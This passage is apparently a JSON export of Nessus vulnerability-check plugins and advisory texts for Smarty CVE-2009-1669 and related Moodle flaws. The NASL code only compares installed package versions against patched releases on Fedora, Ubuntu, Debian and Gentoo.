Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-05-28T00:00:00", "title": "Fedora 11 : php-Smarty-2.6.25-1.fc11 (2009-5520)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-05-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-Smarty", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-5520.NASL", "href": "https://www.tenable.com/plugins/nessus/38935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5520.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38935);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_xref(name:\"FEDORA\", value:\"2009-5520\");\n\n script_name(english:\"Fedora 11 : php-Smarty-2.6.25-1.fc11 (2009-5520)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501564\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/024188.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bfcef54b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-Smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-Smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"php-Smarty-2.6.25-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:21", "description": "This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-05-28T00:00:00", "title": "Fedora 9 : php-Smarty-2.6.25-1.fc9 (2009-5516)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-05-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-Smarty", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2009-5516.NASL", "href": "https://www.tenable.com/plugins/nessus/38932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5516.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38932);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_bugtraq_id(34918);\n script_xref(name:\"FEDORA\", value:\"2009-5516\");\n\n script_name(english:\"Fedora 9 : php-Smarty-2.6.25-1.fc9 (2009-5516)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501564\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/024184.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa577a99\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-Smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-Smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"php-Smarty-2.6.25-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:37", "description": "It was discovered that Smarty did not correctly filter certain math\ninputs. A remote attacker using Smarty via a web service could exploit\nthis to execute subsets of shell commands as the web server user.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-06-25T00:00:00", "title": "Ubuntu 9.04 : smarty vulnerability (USN-791-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-06-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:smarty", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-791-3.NASL", "href": "https://www.tenable.com/plugins/nessus/39518", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-791-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39518);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_bugtraq_id(34918);\n script_xref(name:\"USN\", value:\"791-3\");\n\n script_name(english:\"Ubuntu 9.04 : smarty vulnerability (USN-791-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Smarty did not correctly filter certain math\ninputs. A remote attacker using Smarty via a web service could exploit\nthis to execute subsets of shell commands as the web server user.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/791-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 9.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"9.04\", pkgname:\"smarty\", pkgver:\"2.6.22-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:41", "description": "Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-4810\n The _expand_quoted_text function allows for certain\n restrictions in templates, like function calling and PHP\n execution, to be bypassed.\n\n - CVE-2009-1669\n The smarty_function_math function allows\n context-dependent attackers to execute arbitrary\n commands via shell metacharacters in the equation\n attribute of the math function.", "edition": 27, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1919-1 : smarty - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:smarty"], "id": "DEBIAN_DSA-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/44784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1919. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44784);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_bugtraq_id(31862, 34918);\n script_xref(name:\"DSA\", value:\"1919\");\n\n script_name(english:\"Debian DSA-1919-1 : smarty - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-4810\n The _expand_quoted_text function allows for certain\n restrictions in templates, like function calling and PHP\n execution, to be bypassed.\n\n - CVE-2009-1669\n The smarty_function_math function allows\n context-dependent attackers to execute arbitrary\n commands via shell metacharacters in the equation\n attribute of the math function.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504328\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=529810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-4810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1919\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\n\"Upgrade the smarty package.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"smarty\", reference:\"2.6.14-1etch2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"smarty\", reference:\"2.6.20-1.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:39", "description": "The remote host is affected by the vulnerability described in GLSA-201006-13\n(Smarty: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Smarty:\n The vendor reported that the modifier.regex_replace.php plug-in\n contains an input sanitation flaw related to the ASCII NUL character\n (CVE-2008-1066).\n The vendor reported that the\n _expand_quoted_text() function in libs/Smarty_Compiler.class.php\n contains an input sanitation flaw via multiple vectors (CVE-2008-4810,\n CVE-2008-4811).\n Nine:Situations:Group::bookoo reported that\n the smarty_function_math() function in libs/plugins/function.math.php\n contains input sanitation flaw (CVE-2009-1669).\n \nImpact :\n\n These issues might allow a remote attacker to execute arbitrary PHP\n code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2010-06-03T00:00:00", "title": "GLSA-201006-13 : Smarty: Multiple 
vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4811", "CVE-2008-4810", "CVE-2008-1066", "CVE-2009-1669"], "modified": "2010-06-03T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:smarty"], "id": "GENTOO_GLSA-201006-13.NASL", "href": "https://www.tenable.com/plugins/nessus/46793", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201006-13.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46793);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1066\", \"CVE-2008-4810\", \"CVE-2008-4811\", \"CVE-2009-1669\");\n script_bugtraq_id(28105, 31862, 34918);\n script_xref(name:\"GLSA\", value:\"201006-13\");\n\n script_name(english:\"GLSA-201006-13 : Smarty: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201006-13\n(Smarty: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Smarty:\n The vendor reported that the modifier.regex_replace.php plug-in\n contains an input sanitation flaw related to the ASCII NUL character\n (CVE-2008-1066).\n The vendor reported that the\n _expand_quoted_text() function in libs/Smarty_Compiler.class.php\n contains an input sanitation 
flaw via multiple vectors (CVE-2008-4810,\n CVE-2008-4811).\n Nine:Situations:Group::bookoo reported that\n the smarty_function_math() function in libs/plugins/function.math.php\n contains input sanitation flaw (CVE-2009-1669).\n \nImpact :\n\n These issues might allow a remote attacker to execute arbitrary PHP\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201006-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Smarty users should upgrade to an unaffected version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/smarty-2.6.23'\n NOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since June 2, 2009. It is likely that your system is already\n no longer affected by this issue.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 94, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", 
\"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/smarty\", unaffected:make_list(\"ge 2.6.23\"), vulnerable:make_list(\"lt 2.6.23\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:37", "description": "Thor Larholm discovered that PHPMailer, as used by Moodle, did not\ncorrectly escape email addresses. A local attacker with direct access\nto the Moodle database could exploit this to execute arbitrary\ncommands as the web server user. (CVE-2007-3215)\n\nNigel McNie discovered that fetching https URLs did not correctly\nescape shell meta-characters. An authenticated remote attacker could\nexecute arbitrary commands as the web server user, if curl was\ninstalled and configured. (CVE-2008-4796, MSA-09-0003)\n\nIt was discovered that Smarty (also included in Moodle), did not\ncorrectly filter certain inputs. An authenticated remote attacker\ncould exploit this to execute arbitrary PHP commands as the web server\nuser. (CVE-2008-4810, CVE-2008-4811, CVE-2009-1669)\n\nIt was discovered that the unused SpellChecker extension in Moodle did\nnot correctly handle temporary files. If the tool had been locally\nmodified, it could be made to overwrite arbitrary local files via\nsymlinks. 
(CVE-2008-5153)\n\nMike Churchward discovered that Moodle did not correctly filter Wiki\npage titles in certain areas. An authenticated remote attacker could\nexploit this to cause cross-site scripting (XSS), which could be used\nto modify or steal confidential data of other users within the same\nweb domain. (CVE-2008-5432, MSA-08-0022)\n\nIt was discovered that the HTML sanitizer, 'Login as' feature, and\nlogging in Moodle did not correctly handle certain inputs. An\nauthenticated remote attacker could exploit this to generate XSS,\nwhich could be used to modify or steal confidential data of other\nusers within the same web domain. (CVE-2008-5619, CVE-2009-0500,\nCVE-2009-0502, MSA-08-0026, MSA-09-0004, MSA-09-0007)\n\nIt was discovered that the HotPot module in Moodle did not correctly\nfilter SQL inputs. An authenticated remote attacker could execute\narbitrary SQL commands as the moodle database user, leading to a loss\nof privacy or denial of service. (CVE-2008-6124, MSA-08-0010)\n\nKevin Madura discovered that the forum actions and messaging settings\nin Moodle were not protected from cross-site request forgery (CSRF).\nIf an authenticated user were tricked into visiting a malicious\nwebsite while logged into Moodle, a remote attacker could change the\nuser's configurations or forum content. (CVE-2009-0499, MSA-09-0008,\nMSA-08-0023)\n\nDaniel Cabezas discovered that Moodle would leak usernames from the\nCalendar Export tool. A remote attacker could gather a list of users,\nleading to a loss of privacy. (CVE-2009-0501, MSA-09-0006)\n\nChristian Eibl discovered that the TeX filter in Moodle allowed any\nfunction to be used. An authenticated remote attacker could post a\nspecially crafted TeX formula to execute arbitrary TeX functions,\npotentially reading any file accessible to the web server user,\nleading to a loss of privacy. 
(CVE-2009-1171, MSA-09-0009)\n\nJohannes Kuhn discovered that Moodle did not correctly validate user\npermissions when attempting to switch user accounts. An authenticated\nremote attacker could switch to any other Moodle user, leading to a\nloss of privacy. (MSA-08-0003)\n\nHanno Boeck discovered that unconfigured Moodle instances contained\nXSS vulnerabilities. An unauthenticated remote attacker could exploit\nthis to modify or steal confidential data of other users within the\nsame web domain. (MSA-08-0004)\n\nDebbie McDonald, Mauno Korpelainen, Howard Miller, and Juan Segarra\nMontesinos discovered that when users were deleted from Moodle, their\nprofiles and avatars were still visible. An authenticated remote\nattacker could exploit this to store information in profiles even\nafter they were removed, leading to spam traffic. (MSA-08-0015,\nMSA-09-0001, MSA-09-0002)\n\nLars Vogdt discovered that Moodle did not correctly filter certain\ninputs. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MSA-08-0021)\n\nIt was discovered that Moodle did not correctly filter inputs for\ngroup creation, mnet, essay question, HOST param, wiki param, and\nothers. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MDL-9288, MDL-11759,\nMDL-12079, MDL-12793, MDL-14806)\n\nIt was discovered that Moodle did not correctly filter SQL inputs when\nperforming a restore. An attacker authenticated as a Moodle\nadministrator could execute arbitrary SQL commands as the moodle\ndatabase user, leading to a loss of privacy or denial of service.\n(MDL-11857).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
